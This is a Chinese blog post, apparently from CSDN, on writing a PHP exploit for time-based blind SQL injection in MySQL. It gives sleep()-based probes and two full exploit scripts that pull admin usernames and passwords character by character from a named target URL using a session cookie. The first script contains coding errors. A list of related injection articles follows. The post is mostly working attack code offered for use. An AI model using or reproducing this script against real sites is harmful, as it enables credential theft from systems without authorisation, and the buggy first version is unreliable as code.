延时注入exp编写

最新推荐文章于 2024-04-09 14:22:03 发布
最新推荐文章于 2024-04-09 14:22:03 发布
阅读量288 收藏 2
点赞数
分类专栏: exp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/127654001
版权

1.延时注入语句

php学习

<?php
$time1=time();
echo $time1;
sleep(10);
$time2=time();
print $time2-$time1;
?>

<?php
$time1=time();
sleep(10);
$time2=time();
print $time2-$time1;
?>

mysql的延时语句测试

 select if(‘root’=‘root’,sleep(3),0)

数据的长度

select if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),0)

 每一个字符的ascii码

select if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),0)

延时注入原理是什么?

就是利用mysql里面的sleep()延时 再根据数据库延时 判断网页的页面返回时间

假如条件判断正确 那么就会延时五秒。

构造注入延时的语句,当开始到结束的时候肯定是五秒或者大于五秒。

得到数据长度exp编写

<?php 
	//参数1:访问的url 参数2:post数据(不填则为GET) 参数3:提交的$cookies 参数4:是否返回$cookies
function curl_request($url,$post='',$cookie='',$returnCookie=0){
	$curl=curl_init();
	curl_setopt($curl,CURLOPT_URL,$url);
	curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0(compatible;MSIE 10.0;windows NT 6.1;Trident/6.0)');
	curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
	curl_setopt($curl,CURLOPT_AUTOREFERER,1);
	curl_setopt($curl,CURLOPT_REFERER,"http://xxx");
	if($post){
		curl_setopt($curl,CUROPT_POST,1);
		curl_setopt($curl,CUROPT_POSTFIELDS,http_build_query($post));
	}
	if($cookie){
	     curl_setopt($curl,CURLOPT_COOKIE,$cookie);
	 }
	 curl_setopt($curl,CURLOPT_HEADER,$returnCookie);
	 curl_setopt($curl,CURLOPT_TIMEOUT,10);
	 curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
	 $data=curl_exec($cur1);
	 if(curl_errno($curl)){
	 	return curl_error($curl);
	 }
     curl_close($curl);
     if($returnCookie){
         list($header,$body)=explode("\r\n\r\n",$data,2);
         preg_math_all("/Set\-Cookie:([^;]*);/",$header,$matches);
         $info['cookie']=substr($matches[1][0],1);
         $info['content']=$body;
         return $info;	
     }else{
     	return $data;
     }
   }
   //得到数据长度  
   function getstrlen($url,$cookie){
   	$data_len='';
   	$i=1;
   	while(true){
   		$s="%20and%20if(LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i},sleep(5),0)";
   		$start_time=time();
   		$urlexp=$url.$s;
   		$html=exploit($urlexp,$cookie);
   		if((time()-$start_time)>=5){
   			$data_len=$i;
   			break;
   		}
   		$i++;
   	}
   	return $data_len;
   }
   
   function exploit($url,$cookie){
   	  $html=curl_request($url,'',$cookie);
   	  return $html
   }
   
   function get_data($url,$cookie,$datalen){  
   	$admin_pass='';
   	for($i=1;$i<=$datalen;$i++){     
   		for($j=1;$j<=125;$j++){      
   			$s="%20and%20ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j}";
   			if(strlen($tmp_html)==strlen(exploit($url.$s,$cookie))){
   				$c=chr($j);
   				$admin_pass.=$c;
   				echo $admin_pass."\r\n";
   				break;
   			}
   		}
   	}
   	return $admin_pass;
   }
   
   $cookie='PHPSESSID=lkmi6apekkpfvemo5mnmf7opk7';
   $url='http://www.moontestester.com/article.php?id=1';
   $datalen=getstrlen($url,$cookie);
   print $datalen;
?>

得到数据长度

完整延时注入exp代码

​
<?php 
	//参数1:访问的url 参数2:post数据(不填则为GET) 参数3:提交的$cookies 参数4:是否返回$cookies
function curl_request($url,$post='',$cookie='',$returnCookie=0){
	$curl=curl_init();
	curl_setopt($curl,CURLOPT_URL,$url);
	curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0(compatible;MSIE 10.0;windows NT 6.1;Trident/6.0)');
	curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
	curl_setopt($curl,CURLOPT_AUTOREFERER,1);
	curl_setopt($curl,CURLOPT_REFERER,"http://xxx");
	if($post){
		curl_setopt($curl,CUROPT_POST,1);
		curl_setopt($curl,CUROPT_POSTFIELDS,http_build_query($post));
	}
	if($cookie){
	     curl_setopt($curl,CURLOPT_COOKIE,$cookie);
	 }
	 curl_setopt($curl,CURLOPT_HEADER,$returnCookie);
	 curl_setopt($curl,CURLOPT_TIMEOUT,10);
	 curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
	 $data=curl_exec($cur1);
	 if(curl_errno($curl)){
	 	return curl_error($curl);
	 }
     curl_close($curl);
     if($returnCookie){
         list($header,$body)=explode("\r\n\r\n",$data,2);
         preg_math_all("/Set\-Cookie:([^;]*);/",$header,$matches);
         $info['cookie']=substr($matches[1][0],1);
         $info['content']=$body;
         return $info;	
     }else{
     	return $data;
     }
   }
   //得到数据长度  
   function getstrlen($url,$cookie){
   	$data_len='';
   	$i=1;
   	while(true){
   		$s="%20and%20if(LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i},sleep(5),0)";
   		$start_time=time();
   		$urlexp=$url.$s;
   		$html=exploit($urlexp,$cookie);
   		if((time()-$start_time)>=5){
   			$data_len=$i;
   			break;
   		}
   		$i++;
   	}
   	return $data_len;
   }
   
   function exploit($url,$cookie){
   	  $html=curl_request($url,'',$cookie);
   	  return $html;
   }
   
   function get_data($url,$cookie,$datalen){  
   	$admin_pass='';
   	for($i=1;$i<=$datalen;$i++){     
   		for($j=1;$j<=125;$j++){      
   			$s="%20and%20if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j},sleep(5),0)";
   			$start_time=time();
   		    $urlexp=$url.$s;
   			$html=exploit($urlexp,$cookie);
   			if((time()-$start_time)>=5){
   				$c=chr($j);
   				$admin_pass.=$c;
   				echo $admin_pass."\r\n";
   				break;
   			}
   		}
   	}
   	return $admin_pass;
   }
   
   $cookie='PHPSESSID=lkmi6apekkpfvemo5mnmf7opk7';
   $url='http://www.moontestester.com/article.php?id=1';
   $datalen=getstrlen($url,$cookie);
   
   if($datalen)
   {
   	echo "[+]".$datalen."[+]\r\n";
   	echo get_data($url,$cookie,$datalen);
   }else{
   	 echo "data null";
   } 
?>

​

分析代码原理:

填写登录的cookie和注入的url就会行执getstrlen函数,就会用时间差得出长度为38,再把38传入到get_data函数里,用ascii进行每一个字符的ascii码的判断,再把判断好的ascii转为字符,累加起来就会得到最后结果。

终端运行结果:

jack-yyj
关注
专栏目录
mysql exp_(转载)使用exp进行SQL报错注入
weixin_35172689的博客
01-18 884
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时...
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 939
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
【sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 8271
延时注入】结合if、case when 延时注入
inject某网站延时注入代码
weixin_35771144的博客
06-03 219
GET /down.php/1' UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- --/bb HTTP/1.1Host: yyy.xxx.cnConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1U...
sql注入延时注入
最新发布
weixin_45653478的博客
04-09 2377
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入手册-时间延迟注入
jdk12123的博客
09-01 1891
时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。mysql 延时注入用到的函数 sleep() 、if()、substring()
Python 网络爬虫2:第三方库requests 渗透脚本的编写(SQL注入EXP,主机发现、端口扫描)
Hi~ 土拨鼠
12-30 1787
文章目录Python 编写EXPrequests库的使用http方法发送http请求定制头部超时 Python 编写EXP 主要是针对Web 应用中的漏洞,与Web应用进行交互,大多是基于HTTP协议的,所以需要引入一些关于HTTP的模块,例如:第三方模块 requests模块 安装:pip install requests requests库的使用 http方法 GET 获取资源 POST 传输实体主体 PUT 传输文件 HEAD 获得响应报文首部 DELETE
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1220
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
使用python编写sql时间盲注的exp
CC210231的博客
04-05 1975
前言: 前面学习了布尔盲注的exp,原理是根据页面的两个返回状态来确定注入语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔盲注就无法实行了,此时,我们就要用到另一种盲注方式:时间盲注,也叫延时注入 延时注入原理: 延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数, select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入注入得出数据。 我们在exp中怎样利用呢? 我们可以获
SQL住入原始脚本_SQL注入python脚本_
10-03
SQL注入攻击主要有三种类型:直列注入延时注入和布尔盲注。每种方法都有其特定的利用方式和应用场景。 1. **直列注入**:攻击者尝试直接在输入字段中插入完整的SQL语句,期望服务器能够执行这些语句。例如,通过...
waitfor延迟执行语句 sql server
08-24
waitfor延迟执行语句 sql server
然之协同系统6.4.1 SQL注入exp编写
weixin_30672019的博客
08-03 242
前言 前面已经说明了 漏洞成因,这里介绍一下 exp编写。 正文 为了 getshell 或者是 任意文件下载, 我们需要修改 数据库中的 前缀sys_file 表, 所以我们的利用方式如下 使用 sql 注入 获取程序数据库中任何一个表名, 取得前缀 pre 然后向 presys_file 中插入目标路径。 在 mysql 5 中可以使用 information_schema 来获取指...
HTTP头sleep延迟注入
aitangdao4981的博客
05-30 348
http://123.206.87.240:8002/web15 无回显,通过http header里的X-Forwarded-For字段进行sleep注入。 源码过滤了 ',' 那么相应的if语句可以替换为select case when xxx then xxx else 0 end substr和substring里使用from 1 for 1代替',' 1 # -*...
(转载)使用exp进行SQL报错注入
weixin_33890499的博客
05-19 300
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践 from:https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/ 0x01 前言概述 好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出...
SQL注入延时注入
热门推荐
秋水的博客
09-01 2万+
延时注入简介 个人理解: 延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/ 应用场景: 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入 相关函数 延时注入会用到布尔盲注的所有...
SQL 注入漏洞(八)时间注入/延时注入
不秃头的程序Yang
06-12 4721
二、代码分析 三、sqlmap测时间注入
webug 3、延时注入
乔木同学
03-15 3567
webug第三关,延时注入
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4973
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
sql注入——mysql延时注入
Night_time的博客
05-06 4939
注入思路 1,判断是否存在注入点,注入点是字符型还是数值型 2,构建sleep延时注入语句,猜测当前数据库的库名的长度是几个字符 3,猜测数据库下的表名的长度是由多少个字符组成的 4,猜测字段名(列名) 5,猜测数据 使用延时注入的时机 用于,无法回现和无法显示错误页面的场景 使用if(length(注入语句)=N,sleep(5),1),改变N的值,如果条件成立,通过服务器的休...
延时注入的payload有哪些
07-11
延时注入(Delay-Based SQL Injection)是一种攻击技术,利用数据库查询中的延时函数来实现注入恶意代码。以下是一些常见的延时注入Payload示例: 1. 基于`SLEEP()`函数的延时注入: ``` ' OR SLEEP(5)# ``` 上述...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值